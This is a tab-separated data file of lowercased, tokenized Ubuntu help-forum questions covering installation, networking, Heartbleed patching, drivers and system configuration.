445028	how to connect to sql server using php ?	i have microsoft sql server 2008 on windows pc but my php is on ubuntu , hosted by webfusion . i have n't configured anything at all but i want php to connect to sql server . what drivers do i need and how can i install it ?
445029	ubuntu os insatallation on windows 7 os pc	how can i install ubuntu os in a windows 7 os pc ? is it possible to use both os in same time can i turn back to windows 7 later thanks , shiju
445030	remove quotes around integers in a csv file	in a large ( > 1 gb ) csv file i have something like '' 34432 '' , `` name '' , `` 0 '' , `` very long description '' but instead of that i 'd like to have 34432 , `` name '' , 0 , `` very long description '' . i was looking at sed but this task is out of my scope . any advice how to achieve this ?
445033	what does the output of apt-get install -- dry-run mean ?	i want to upgrade a server to make sure the recent openssl bug gets patched . so , to check the versions of things i 'll be installing , i run apt-get install -- dry-run , and see a line like : inst openssl [ 1.0.1-4ubuntu5.11 ] ( 1.0.1-4ubuntu5.12 ubuntu:12.04/precise-updates [ amd64 ] ) and i realize i do n't know what that means . does it mean it 's going to install 1.0.1-4ubuntu5.11 and that 5.12 is available , or that i 'm currently running 5.11 and it 'll upgrade to 5.12 ? as requested , here 's the output of apt-cache policy openssl : openssl : installed : 1.0.1-4ubuntu5.11 candidate : 1.0.1-4ubuntu5.12 version table : 1.0.1-4ubuntu5.12 0 500 http : //archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/main amd64 packages *** 1.0.1-4ubuntu5.11 0 100 /var/lib/dpkg/status 1.0.1-4ubuntu3 0 500 http : //archive.ubuntu.com/ubuntu/ precise/main amd64 packages ... and i think that clears things up . it looks like it 'll be grabbing 5.12 from either archive.ubuntu.com or security.ubuntu.com . what 's the preceding 500 ?
445039	bulk/batch-rename files with different endings ( not change the endings )	my problem , that i 've got a folder with many different files like : xxxxxxxxx.avi yyyyyyy.jpg zzz.txt and i want to rename them into 001.avi 002.jpg 003.txt it 's not working with thunar rename , because the filenames are not all the same length . maybe with rename 's/ . * ... ... , but i am kinda stuck ... thanks for any suggestions
445042	has anyone succeeded in using efax-gtk with an external fax modem under ubuntu ?	i have been trying to use efax-gtk with an external usrobotics fax modem under ubuntu 12.04 in vain for several weeks . i can configure efax-gtk properly to select my hp compaq 's only serial port /dev/ttys0 . efax-gtk has no trouble in accepting the selected fax file or fax phone number . after i click on the 'send fax ' button , the 'sending fax ' indicator comes on and then goes off . even though everything appears fine , the faxsent directory shows nothing and the faxlog file shows only the starting and ending times . what is more , my rs232 mini tester has shown no eia signal activities . nor do the modem's status indicators blink . this leads to me to think that the modem really has not received any electrical signals from the computer and therefore it remains idle . before the pc and modem are connected , their respective eia signals appear correct . but as soon as they are connected , all eia signals go off . is my problem due to ubuntu 12.04 or my fax modem ? julianloui
445044	how do i setup openvpn to rotate logs ?	i would like to rotate my openvpn logs . how can i accomplish this ?
445046	mod_proxy timeout error on ubuntu server	my apache2.2.2 server hung up every day on almost same time , and i have to restart the apache server . i am getting the following error messages in apache error log . [ tue apr 08 07:09:06 2014 ] [ error ] [ client 8.35.200.33 ] ( 70007 ) the timeout specified has expired : proxy : error reading status line from remote server mydomain.com:443 [ tue apr 08 07:09:06 2014 ] [ error ] [ client 8.35.200.33 ] proxy : error reading from remote server returned by /bla/bla/bla [ tue apr 08 00:09:14 2014 ] [ error ] [ client 8.35.200.40 ] ( 70007 ) the timeout specified has expired : proxy : error reading status line from remote server mydomain.com:443 [ tue apr 08 00:09:14 2014 ] [ error ] [ client 8.35.200.40 ] proxy : error reading from remote server returned by /bla/bla/bla i am using mod_proxy as reverse proxy which is activated by rewriterule directive . i have tried all option mentioned in pr # 37770 . here is my apache2.cong settings : keepalive off maxkeepaliverequests 100 keepalivetimeout 15 setenv force-proxy-request-1.0 1 setenv proxy-nokeepalive 1 proxytimeout 300 please help , i am facing this issue at my production server . thanks ! ahsan
445051	which notes-apps featuring notes that stick to the desktop are available for unity	i 'm looking for something like stickynotes or xfce4-notes . i read the former is not supported anymore . does the latter work well in unity ?
445057	use squid3 on same machine in tor browser 3.5	i 'm using tor browser bundle 3.5.3 and squid3 ( version 3.3.8 ) on ubuntu 13.10 as transparent http proxy on the same machine ( i.e . not usual setup on gateway ) . i redirect http request through squid with the following iptables rules added in /etc/rc.local sudo iptables -t nat -a output -m owner -- uid-owner `id -u proxy` -j accept sudo iptables -t nat -a output -p tcp -- dport 80 -j redirect -- to-port 3128 sudo iptables -t filter -a output -m owner -- uid-owner `id -u proxy` -j accept sudo iptables -t nat -a prerouting -i bond0 -p tcp -- dport 80 -j redirect -- to-ports 3128 how can i use squid in the same way for by tor browser ? my /etc/squid3/squid.conf looks like this : http_port 3128 transparent hierarchy_stoplist cgi-bin ? acl query urlpath_regex cgi-bin \ ? no_cache deny query always_direct allow all acl all src all acl localhost src 127.0.0.1/32 acl localhost src 192.168.178.62/32 acl localnet src 192.168.4.0/24 acl to_localhost dst 127.0.0.0/8 acl ssl_ports port 443 563 acl ssl_ports port 873 acl safe_ports port 80 acl safe_ports port 21 acl safe_ports port 443 563 acl safe_ports port 70 acl safe_ports port 210 acl safe_ports port 1025-65535 acl safe_ports port 9050 acl safe_ports port 9051 acl safe_ports port 8118 acl safe_ports port 8080 acl safe_ports port 280 acl safe_ports port 488 acl safe_ports port 591 acl safe_ports port 777 acl safe_ports port 631 acl safe_ports port 873 acl safe_ports port 901 acl purge method purge acl connect method connect http_access allow manager localhost http_access deny manager http_access allow purge localhost http_access allow purge localnet http_access deny purge http_access deny ! safe_ports http_access deny connect ! ssl_ports http_access deny to_localhost http_access allow localhost http_access allow localnet http_access deny all http_reply_access allow all access_log /var/log/squid/access.log squid icp_access allow all forwarded_for off coredump_dir /var/spool/squid and works for http requests . adding tor browser 's ports 9050 and 9051 ( see config file ) did n't help .
445059	minimum space requirement for /boot partition	one question arise in my mind during the installation of ubuntu that what are the minimum space requirement for the /boot partition ? because only the kernel , grub and initrd file are present in this section of linux . so i want to know what is the minimum sapce require to create this prtition ? can we create this partition equal to the size of all file like grub , kernel and initrd ?
445063	where 's my windows gone !	i installed ubuntu on my xp computer but when it starts up it just boots strait into ubuntu & i ca n't access xp at all.where 's it gone ? i think i might have made a mistake not setting up a partition beforehand.i just moved the slider allocating 79gb to abuntu & leaving windows with 71gb assuming that was making a partition that i could duel boot from.now i 'd like to remove abuntu & start again but how do i do it ?
445064	how to browse the internet while installing ubuntu ?	during the installation of ubuntu 14.04 final beta release on virtualbox . i was prompted with the option of reading the release notes . being so curious about what difference does 14.04 make compared to 13.10 , i chose to read the release notes and firefox popped up . other than the opened page was just ubuntu.com and no the release notes page , i found that i can actually browse other websites too , which i consider could be extremely helpful in some situations . so how can i open firefox during ubuntu installation ? i ca n't rely on the installation to have a link to release notes in the first step , so i can open firefox through it . i 'm asking if there is a generic way to do this .
445068	power via another computer	i am 13 and am considering putting ubuntu on my parents old computer , however it is very slow . i was wondering if i could make it so their computer uses part of my computers power ( i have a fast computer ) but i still get to use windows . so my computer in a way hosts two computers with 2 different oss . thank you !
445072	linked problem with a windows program which i need to run one time	when i have used windows 8 i have set to keep battery life with lenovo power management . it have charged battery to 60 % and keep it so . one time i have started my laptop without battery and this configuration have reset . i found in the internet that this option can be changed only from windows ( 7,8,8.1 ) . i think that it 's 2 solutions : install windows in the hard drive , but the ext4 partition resizing need more time ( using gparted ) . do it exist other method to resize ? i have 200gb free space . make a live usb stick , install lenovo energy management and change the configuration .
445074	append current timestamp on files name from background running command	following is command that i have used in bash script and it is run on background : sshpass -p prakash12 ssh -t -p $ 1 prakash @ localhost './test_new_update_script.sh > /home/log/unit_update_output.log 2 > /home/log/unit_update_error.log < /dev/null | echo $ ! > /home/log/unit_update_pids & ' this command created 3 files at run time i.e . unit_update_output.log , unit_update_error.log and unit_update_pids . and print the related info . in that files . i want to append the current timestamp at the end of each 3 files name . like : unit_update_output-2014-04-08t22-15-02.log `` 2014-04-08t22-15-02 '' this is current timestamp . the above command is running on background : so how can i do this ?
445076	installed 12.04 can not turn it on	i 've wiped my system of windows xp . installed 12.04 , 32 bit version , via dvd installation . i get a white box saying `` the system is running in low graphics mode . your screen graphics card , and input device settings could not be detected . you must configure these yourself . '' ok. then , it 's just a back and forth in three different boxes of options with no way out . when i attempt the system login option , it will not let me type my password ! help !
445081	can not connect to wifi and my switch is red instead of white	am using hp envy notebook 15 laptop and i just made my machine dual boot for windows and ubuntu . my wireless connection works perfectly in windows but can not work in ubuntu , the type of ethernet card in my system is rtl8111/8168 pci express gigabit ethernet controller . can you please teach me what to do because when type rfkill list in my terminal both soft blocked and hard blocked is configured `` no '' ? .am using ubuntu 13.04 if u need to know .
445083	problems with openssl-heartbleed in ubuntu12.04lts	since i have not enough reputation to comment an existing answer , i create this new question . i have a vserver with ubuntu 12.04lts . because of the heartbleed-bug in openssl1.0.1 i upgraded all possible packages on my vserver . dpkg -l | grep openssl says : ii openssl 1.0.1-4ubuntu5.12 secure socket layer ( ssl ) binary and related cryptographic tools i rebooted the vserver , created new certificates and rebooted the server again , but the self test says the server is vulnerable . where is my fault ?
445085	non privileged user launch ssh ?	my server got hacked , and as a result the server guys decided that my apache user would be one called 'nonpriv ' which has no privileges at all . before that happened , i had a user that run apache which had lots of privileges . i used that user to launch a script which does several ssh connections . i have a ui that lets users in my system to launch that script . however now , since the apache user does not have privileges , he ca n't perform those ssh calls . i tried several things : 1 - make my apache user to do the ssh calls . but oh , this non privileged user does n't even have a shell . 2 - make my apache user to tell the other user to do the calls , but not working . 3 - researched on named pipes so that these two users can somehow communicate , but is confusing . so my question is : how do you deal in these situations ? if your apache user does n't have privileges , but you need that from a web application launch a script that does ssh calls .
445089	how to prevent gnome-mplayer from asking to resume at the latest position	gnome-mplayer asks whether to resume at the latest position if the playback has been canceled before the end of the video in a previous run of the program . how can i prevent this , i.e . start every video ( in gnome-mplayer ) from the beginning without being bothered ? i checked the settings dialog and search for the question in popular search engines .
445090	which version for acer aod255e ?	i have an acer one netbook model aod255e that currently has ubuntu natty currently installed . it runs exceptionally slow for some reason and freezes . havent ' used it in over a year and would like to update . i need to know what version of ubuntu would be compatible on this machine . seems the problem is with unity .
445095	installed proprietary amd graphics drivers from settings , rebooted , and display always turns off after decrypting partitions on boot screen	i did a fresh installation of ubuntu 13.10 on my system , fiddled around a bit until i was comfortable with the system , and then went to the settings window and elected to installed the proprietary amd graphics drivers ( fglrx-updates ) . following a reboot , i was only able to enter a passphrase and successfully mount my encrypted partitions before the monitor went into power-saving mode and keyboard input became unresponsive . i need to revert the changes or at least make the installation successfully use the graphics drivers i installed .
445097	how to create disc that installs ubuntu ?	i just downloaded ubuntu 13.10 desktop -amd64 but it is an iso file . do i have to create a disc ( make bootable cd ) to install new os ( ubuntu 13.10 ) ? i have n't done this before .
445098	how do i get to/view my files on my home network with lubuntu	support for windows xp ends in ( approx . ) 13 hours ... so i loaded lubuntu on my computer . i have a hard drive attached to my router so all the computers in the family can share files . i don’t know how to get to those files with lubuntu . should n't i be able to see my ( network ) files with pcmanfm ? i’m sure being in alien territory is just getting the best of me . from the start menu of windows7 i click on “computer” then “network” on the left , tree branches drop down and voilà there they are . i searched the web and could only find info on a program called samba . i 'm not sure that’s what i want . i don’t want to arbitrarily install something i don’t need . furthermore , all the articles mentioned being able to view windows files . isn’t a jpg or pdf file the same regardless the operating system ? hope you can dumb it down/point me in the right direction . thanks !
445099	what 's the opposite of setxkbmap -option ctrl : nocaps ?	normally i have caps lock to be a control key . setxkbmap -option ctrl : nocaps makes that happen , but i ca n't remember where i got it from or find any docs ( man setxkbmap is singularly unhelpful ) can anyone tell me the command to put it back to how it normally is , or at least point me at the docs that tell me what -option ctrl : nocaps actually does ?
445103	really installed packages in ( k ) ubuntu	1 ) first question how to list really installed packages in ubuntu ? the problem of dpkg -- get-selections ( the command written in almost any forum ) is that its second column ( which is install / deinstall ) completely depends on previously issued commands ( i mean dpkg -- set-selections and dpkg -- clear-selections ) , but not on actual state of package ( installed or not ) . 2 ) second question i ( investigating described above problem ) semi-occasionally executed command - dpkg -- clear-selections , and now have almost all packages in deinstall state . so how can i update states of packages ( and make them consistent with those states , which aptitude show < pkg_name > outputs ) ?
445105	username and password during boot-up	i just installed ubuntu using windows installer . when i try to boot up , it first tells me my graphics is not configured correctly , then it asks me for a user name and password which i dont remember ever supplying . what to do ?
445110	overheating , faulty laptop - how to prevent overheating ?	i have a problem with my laptop . it overheats . in windows 7 i use 80 % maximum power state under power options to workaround the issue . is there a similar solution available for ubuntu ? can i set my maximum processor power state somehow to 80 % ?
445112	how can i to share just one folder to anonymous	i have created a user on pure-ftp with password but i want to share one folder amounts whole the folders with anonymous without login , how can i do it ?
445113	ubuntu touch on xperia z tablet ( lte )	is it possible to install ubuntu touch on xperia z tablet ( lte ) using the method describe here ? thanks
445116	ubuntu 12.04 is certified with lsb4.0 exactly ?	i heard that ubuntu 12.04.4 lts follows the lsb ( linux standard base ) 4.0 . i checked the ubuntu 12.04.4 using dist-check tool ( lsb-dist-checker-4.0.1.9-2.i486.tar.gz ) for more than 12 hours to make sure it is true . however , the test results do not comply with the lsb 4.0 . how to do i understand ? ubuntu 12.04 is lsb certified distro , right ? if it is true , is there a way anything else in order to confirm this ? test result is in following :
445117	how to really check current cpu hz ?	all programs i 've tried seem to be listing hz from cpu 's specifications not actually checking what the current hz really is . for example a processor is marketed with 4ghz.but this is the max ( unless you over/under/clock ) and if the cpu is n't doing anything or is getting too hot it will throttle down . the program always will say 4ghz even when the cpu is at 2ghz.i want to avoid this and know the real hz . what programs actually check current cpu hz and not just read cpu specifications ?
445119	problem with ufw enable : libkmod : error ../libkmod/libkmod.c	i am trying to enable ufw and this is the output : root @ p : ~ # ufw enable command may disrupt existing ssh connections . proceed with operation ( y|n ) ? y error : problem running ufw-init libkmod : error ../libkmod/libkmod.c:505 kmod_lookup_alias_from_builtin_file : could not open builtin file '/lib/modules/2.6.32-042stab078.27/modules.builtin.bin' fatal : module nf_conntrack_ftp not found . libkmod : error ../libkmod/libkmod.c:505 kmod_lookup_alias_from_builtin_file : could not open builtin file '/lib/modules/2.6.32-042stab078.27/modules.builtin.bin' fatal : module nf_nat_ftp not found . libkmod : error ../libkmod/libkmod.c:505 kmod_lookup_alias_from_builtin_file : could not open builtin file '/lib/modules/2.6.32-042stab078.27/modules.builtin.bin' fatal : module nf_conntrack_netbios_ns not found . iptables-restore : line 69 failed iptables-restore : line 30 failed ip6tables-restore : line 65 failed sysctl : permission denied on key 'net.ipv4.tcp_sack' problem running '/etc/ufw/before.rules' problem running '/etc/ufw/after.rules' problem running '/etc/ufw/before6.rules' it 's a fresh installation of an ubuntu 13.04 64 bits , what is wrong ?
445121	very loud cd/dvd drive . ubuntu 13.10	firstly i have to aoplogize for any mistakes , i am not native english speaker . but i will try my best to tell what is happening . when using windows xp my cd/dvd drive was working normally as long as i was watching movies in windows media player . when watching a movie with any other program , it was extremely loud . now i am using ubuntu 13.10 and obviously i have no windows media player . i am using vlc and my cd/dvd drive is not working normally . what can be wrong ? thanks for all answers !
445125	raw exports wrong ( photivo , rawtherapee )	i am using ubuntu 13.10 . i started shooting my images in raw ( nef ) and downloaded photivo to process them . while working in photivo , everything is ok . the problem is when you save the rendered image . rendered preview in photivo looks great , but the saved image is a little flatter , seems noisier , looks heavily compressed ( like dark areas of photos on facebook ) and what was blue in the preview is purple in the saved result . generally , preview looks good , result is ugly . setting higher jpg quality did not change anything visibly and neither did switching to .png ( except 10x the filesize , of course ) does anyone know what might be causing this ? update : tried rawtherapee , there is a similar problem . purple tint on blue tones , awful noise . i have no idea where the problem could be . the previews look good .
445130	will ubuntu 14.04 trusty tahr update ?	will ubuntu 14.04 trusty tahr request me to update when the actual lst gets released or will i have to manually download another image file and install on virtualbox ?
445131	how do i enable a specific pam config in the lockscreen ?	in trusty , there is a new lockscreen that fits the look and feel of lightdm , and shares some config files , especially for pam . i am using libpam-fprintd to allow using my fingerprint reader when asked for a sudo password , or for unlocking the screen . the point is that i do n't want to allow the fingerprint reader when logging into the desktop . but i want to allow it when unlocking the screen . the reason for that is that fingerprint wo n't allow to open the gnome-keyring , which is fine when unlocking , but not when loging-in . this also enables me to have a strong password , as i type it only once , then use the fingerprint reader . see the ppa page instructions , especially the `` note on keyrings and passwordless logins '' part before the new lock-screen , /etc/pam.d/lightdm was used by the greeter , not by the ( old ) lock-screen . so i had a different behaviour when logging in and when unlocking , which was exactly what i wanted . see this page from the thinkwiki for the config used . now , it seems that /etc/pam.d/lightdm is used by both the greeter and the lock-screen . so my need would be to have a distinct pam config file for the greeter and for the lock screen . is this possible ?
445133	configuring additional two monitors to an ubuntu12.04 installed system	can anyone please guide me how to configure additional monitors to my ubuntu12.04 installed system ? what kind of information should i need before installing anything , like drivers or something ? i am quite new to linux and have no good idea . please let me know if my question is incomplete or you may need additional information . cheers ! zia
445134	accessing nfs export on mac	i am new to umbuntu and my first attempt is to set up home server using server 12.04.4 . i have the server 'running ' and i have been following this guide- http : //linuxhomeserverguide.com . my first problem is accessing my new nfs export that i created using webmin 1.680 with my mac running osx 10.9.2 . i mounted the lv by adding the following line in /etc/fstab -- /dev/mapper/server -- vg-media /media/media ex4 rw 0 0 i then pointed webmin to export the media folder for nfs exports . i checked the /etc/exports folder to make sure that the nfs is in fact being exported and i found this line in the file /export/media 192.168.1.0/255.255.254.0 ( insecure , no_subtree_check , rw , nohide ) i have been working on reaching this share for a week now and tried many many ways to access it . basically my first goal will be to set up a 'share ' folder that i can move media into from my mac or pc and have my rasberry pi running xbmc also access it to stream media ( i also plan to use smb to host the same folder ) .
445135	why is 'sudo bash ' a bad idea ?	anyone want to comment on sudo bash in comparison to sudo su and sudo -i ? i know sudo -i is the preferred because `` environment '' . i 've gotten into the bad habit from years ago when i was a kid in a basement of using sudo bash . i know it 's rather kludgy and awkward , but it works . i 'm looking for a precise and compelling argument to cut my brain free from this habit . please tell me why my method is trash ? i need an intervention .
445141	why does my filesystem appear to be full to ubuntu ?	i have seen some questions and i know that ubuntu reserves 5 % of filesystem to root . believe me this is not the case . i was moving some files from my home folder to another partition and i had to cancel the copying process due to some reason ( the copy did n't stop abruptly , i cancelled it ) . now when i try to move the remaining files i get error error opening file '/media/sda5/android/carbon/external/icu4c/i18n/ucol_bld.h ' : no space left on device . the destination partition has 85gb free and my source ( ubuntu home ) partition has 12gb free ( total of 48gb , 5 % of 48 is not 12 ) . is there any other reason why i might get this error ? how do i fix it ? note : the path from which i was moving had a lot of directories and sub-directories . ( it was android source actually . so you can imagine . ) i do n't know if that information might be useful . edit : df -h | grep -v '^none ' gives filesystem size used avail use % mounted on /dev/loop0 48g 34g 12g 75 % / udev 3.9g 4.0k 3.9g 1 % /dev tmpfs 793m 1.4m 792m 1 % /run /dev/sda7 50g 50g 441m 100 % /host /dev/sda9 50g 34g 17g 68 % /media/sda9 /dev/sda6 300g 281g 20g 94 % /media/sda6 /dev/sda5 300g 221g 80g 74 % /media/sda5 df -h -i | grep -v '^none ' gives filesystem inodes iused ifree iuse % mounted on /dev/loop0 3.0m 874k 2.2m 29 % / udev 989k 578 989k 1 % /dev tmpfs 992k 655 991k 1 % /run /dev/sda7 505k 66 505k 1 % /host /dev/sda9 17m 38k 17m 1 % /media/sda9 /dev/sda6 20m 110k 20m 1 % /media/sda6 /dev/sda5 81m 1.1m 80m 2 % /media/sda5 please note that the partitions in question are /dev/loop0 and /dev/sda5 edit 2 : i just noticed that i am even unable to create new documents in my partition /dev/sda5 ( all the more reason to panic ) edit 3 : i fired sudo strace mv . here is the output . i do n't really understand it a lot .
445143	how do i connect to a bubbleupnp server using my ubuntu desktop ?	so i have a headless ubuntu machine somewhere on the globe with minidnla installed and i can connect to it using the bubbleupnp app on my android phone and render the tracks on my mobile which is great . what i would like to do next is somehow connect to the bubbleupnp server using my desktop . i 've installed banshee and turned upnp on but now i guess i need some sort of bubbleupnp application on my desktop to make the remote minidnla library visable ? could anyone shed some light or point me in the right direction ?
445145	password for apps	i want to limit access to running apps with a password . is that possible ? i have an app in the tray icon and i want to close it for unauthorized access . greetings
445149	epson epl-5900l page displacement	i just configured my epson-epl5900l printer using this guide however whenever i try to print something from the test page to a libreoffice document the page has a 0.5mm offset in width and height so all the text is moved toward the left-upper corner . how can i solve this issue ? can manually editing the ppd file help ? if yes how and where i should edit the file ?
445150	how can cloud-init access files passed as -- file option during boot up	my image is cloud enabled and i pass user-data script with config-drive=true which cloud init is able to execute during boot up . i also need to pass a separate file which is required for one of the operation in user-data script . i pass this file as -- file option in nova boot command . how can i access this file during boot up process so that cloud-init can process it too ? i see that once vm is up and running and when i mount the config-drive , i see my file available as openstack/contents/000 , but i need to access this file via my user-data script ..is it possible ?
445152	do i need to update mod_ssl for cve-2014-0160 ?	i have updated openssl to version 1.0.1 g on my ubuntu 12.04.4 lts : user @ server # dpkg -l |grep openssl ii openssl 1.0.1-4ubuntu5.12 secure socket layer ( ssl ) binary and related cryptographic tools ii python-openssl 0.12-1ubuntu2.1 python wrapper around the openssl library question : do i need to update apache2 mod_ssl too ? if yes , how ? user @ server # strings /usr/lib/apache2/modules/mod_ssl.so | grep -i `` openssl '' openssl_add_all_algorithms_noconf openssl_load_builtin_modules openssl_1.0.1 openssl_1.0.0 sslfips invalid , rebuild httpd and openssl compiled for fips openssl 1.0.1 14 mar 2012 openssl ah01894 : unable to initialize tls servername extension callback ( incompatible openssl version ? ) ah01913 : unable to initialize tls session ticket key callback ( incompatible openssl version ? ) openssl 1.0.1 14 mar 2012 apache2 version user @ server # dpkg -l |grep apache2 ii apache2 2.4.2-2~ppa1 apache http server ii apache2-bin 2.4.2-2~ppa1 apache http server ( binary files and modules ) ii apache2-data 2.4.2-2~ppa1 apache http server ( common files ) ii apache2-mpm-worker 2.4.2-2~ppa1 transitional worker mpm package for apache2 ii apache2-utils 2.4.2-2~ppa1 apache http server ( utility programs for web servers ) rc apache2.2-common 2.2.22-1ubuntu1.4 apache http server common files
445155	problem when check for updates	please , helpp ... i can not update ... an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : malformed line 63 in source list /etc/apt/sources.list ( dist parse ) '
445157	command not found when trying to set governor	in response to my questioning here : how to really check current cpu hz ? sylvain pineau told me to do this command to change cpu governor : echo `` powersave '' > /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor i opened /sys/devices/system/cpu directory and saw there is n't any folder named like cpu inside it after getting no such file or directory in response to the command . maybe that explains why other commands involving /sys/devices/system/cpu/cpu* give me the same error .
445159	uefi - black screen when attempting to install ubuntu	today , i received my new packard bell en te69bm . the laptop comes with garbage aka windows 8 . i want to install ubuntu on it . unfortunately the bios is set up to boots the flash drive in efi mode and this setting can not be changed . i 've tried installing ubuntu 12.04 and 13.10 but to no avail . ( secure boot is off ) i get the options : try ubuntu without installing install ubuntu check disk for defects no matter what i select , i simply get a never changing black screen no matter how long i wait . i have the latest bios installed on the device . i 've tried the following : https : //help.ubuntu.com/community/uefi but it did not work ! any way to get ubuntu working on my notebook ?
445160	firefox bookmarks on ubuntu 12.04 start page	i just installed ubuntu 12.04 lt . the ubuntu start page is firefox browser , but has no 'bookmarks ' icon showing ? how do i 'bookmark ' sites for future re-call ? how do i download or place the many bookmarks i have , from the 'xp ' machine ubuntu is replacing ? i reviewed all the postings suggested , but could not find answer . i 'm a novice .
445162	trying to execute update-alternatives command specified in an instrutional document	i am trying to execute the following command sudo update-alternatives `` /usr/local/bin/java '' `` java '' `` /usr/java/jdk1.6.0_45/bin/java '' but i keep receiving the error message update-alternatives : error : unknown argument `/usr/local/bin/java' what might i do to successfully do what this command means to do ? ( this is to setup an android environment for a in-class lab , i by no means understand what i am doing or what this command means to do , i just need to get it done ... ) i have looked and the file `` /usr/local/bin/java '' does not exist on my system
445164	do i need to take action on a 10.04 lts server to avoid the heartbleed vulnerability ?	from the heartbleed.com website , i see that openssl 0.9.8 is not vulnerable , which is the version that is available on 10.04 . that should mean that actually having stuck with 10.04 until now has avoided any problems with this issue for my production servers . is that correct or am i still missing something and there is action that should be taken on 10.04 servers ?
445169	upstart job ( .conf ) fails to install	i have a simple package ( .deb ) wherein the main goal is to create an upstart job . call it foo . it fails to create the job file /etc/init/foo.conf . package definition i have created the package source using dh_make -- createorig and added foo.upstart to the debian directory . i build the package with debuild -us -uc . installation sudo dpkg -i foo_1.0-1_all.deb when i install the package on one machine it goes fine , but another it fails . ( foo.conf is added to /etc/init and the service is started ) . that is , foo.conf is not added to /etc/init . the backwards-compatibility foo script ( symbolic link to upstart-job ) does get added to /etc/init.d , and doc files are added to /usr/share/doc/foo . but , /etc/init/foo.conf is missing . edit originally i believed the problem was due to architecture . that was simply because i had a working install on amd64 , but the problem occurred on an i386 machine . i neglected to realize that i had previously done manual installation & removal on the i386 machine which dpkg avoided interfering with .
445180	block ip address on hostapd network	i share my internet access through hostapd how can i block the client of the ap from accessing a certain ip address ?
445182	ubuntu needs mouse hit to shutdown	my devices ca n't shutdown `` automaticly '' . i have two machines with the same troubles : 1 ) on notebook : notebook ca n't shutdown automaticly , when the battery capacity is extremely low . i applied different settings in dconf org.gnome.settings-daemon.plugins.power , but there is no result . i even set false at `` use time for policy '' , but there are no actions except of notifications . 2 ) on the pc i 'm unavailable to shutdown pc via button . i may set suspend etc on the power button , but if i choose `` shutdown '' - the interactive dialog opens , where i am to choose action once again 3 ) everybody needs to confirm their choise when they hit `` restart '' or `` shutdown '' in the unity tray menu . so i do n't know where is the problem exactly . but it seems that all power settings are located at org.gnome.settings-daemon.plugins.power and this is gnome-power-manager . how to solve it ? the first trouble is most critical
445183	low graphics mode on compaq computer	i am very new to linux and ubuntu . i have an obsolete brand of computer with these specs : compaq presario-sr1500nx , 3000+amd processor , 256mb-pc2700 memory , 80gb-7200rpm hard drive . i am stuck with the `` low graphics mode '' box and have yet to find an answer that works for me . i wiped my hard drive and installed ubuntu , thinking it would work fine . so , now , i just have ubuntu os that wo n't work . is my system compatible and if not , what will work as an operating system ? i 'm not computer savvy so dumbing down or thorough explanation would be appreciated .
445186	how to check current mtu value	how can i check the mtu value for my current connection ? in my network connection settings , the mtu is set to automatic and i would like to know wich value was automatic selected for it .
445193	kvm virtual machine manager : sharing folders not working	i 've created an ubuntu vm inside my ubuntu using virtual machine manager . i 'm trying to mount a host directory in guest os but it 's not working . i used the instructions provided here : http : //troglobit.com/blog/2013/07/05/file-system-pass-through-in-kvm-slash-qemu-slash-libvirt/ the mount command completes silently : mount -t 9p -o trans=virtio , version=9p2000.l , rw myshare /mnt/host mount output looking promising : myshare on /mnt/host type 9p ( rw , trans=virtio , version=9p2000.l ) attempting to list the directory : cd /mount ls ls : can not access host : permission denied total 0 d ? ? ? ? ? ? ? ? ? ? ? ? host
445196	usb floppy drive	just installed 12.04 , am trying to get syst to recognize a usb floppy drive ; it reads flash drives just fine but while the drive ( and the test floppy in it ) work on another system , the file window wont open , and all i can see is that it is recognized in the disk-utility , but the only option there is reformat . is there any way to use this device without resorting to using command-lines ? ( i 'm still autodidacting the shell , would rather get comfortable with that first before going nerd on the thing -- one reason i went with ubuntu in the first place was to get away from all that windows nonsense of having to revert to dos for silly stuff ... ) so , any ideas ?
445200	packages can not be authenticated ! - traceroute	i am trying to install traceroute in ubuntu and i am getting the following message . sudo apt-get install traceroute reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : traceroute 0 upgraded , 1 newly installed , 0 to remove and 6 not upgraded . need to get 53.1 kb of archives . after this operation , 162 kb of additional disk space will be used . warning : the following packages can not be authenticated ! traceroute install these packages without verification [ y/n ] ? n e : some packages could not be authenticated but when i install on my friend 's system , it works fine . sudo apt-get install traceroute [ sudo ] password for ankit : reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : traceroute 0 upgraded , 1 newly installed , 0 to remove and 12 not upgraded . need to get 53.1 kb of archives . after this operation , 162 kb of additional disk space will be used . get:1 http : //in.archive.ubuntu.com/ubuntu/ precise/universe traceroute amd64 1:2.0.18-1 [ 53.1 kb ] fetched 53.1 kb in 1s ( 28.8 kb/s ) selecting previously unselected package traceroute . ( reading database ... 207690 files and directories currently installed . ) unpacking traceroute ( from ... /traceroute_1 % 3a2.0.18-1_amd64.deb ) ... [ 1 ] + stopped sudo apt-get install traceroute what is wrong in my system ? thanks in advance .
445201	reload profile with java version	.profile has export java_home= $ dev_home/tools/jdk1.6.0_45 # export java_home= $ dev_home/tools/jdk1.7.0_51 # export java_home= $ dev_home/tools/jdk1.8.0 export path= $ path : $ java_home/bin i work with multiple versions of java like above . so i comment out required version of java from export and then do source ~/.profile this changes the java_home , but java -version does not changes . means the path does not gets updated . any idea how can i force path also to have new java version thanks edit one solution i found is to add following lines in .profile to reset path to default and then add what i have customized not sure if this is ideal solution path= '' '' path=/usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games after that i have my custom path statements like java home etc
445204	i need a step-by-step guide to navigating directories in terminal	i am a linux/ubuntu noob and i have saucy salamander . lately i installed the android tablet emulator for ubuntu using virtualbox from the software center . i followed all the steps listed here but when i got down to the section where it says '' androvmplayer the androvmplayer is a software used to display the vm content and manage its events . it wonât work if the vm is not running ! open a command line interpreter , get to the androvmplayer directory , and type : androvmplayer [ width ] [ height ] [ density ] '' i have no clue how to navigate directories . every place i go , it seems they expect people to just know this . i would like a step-by-step guide explaining each step to navigating to that particular directory . somebody please help ?
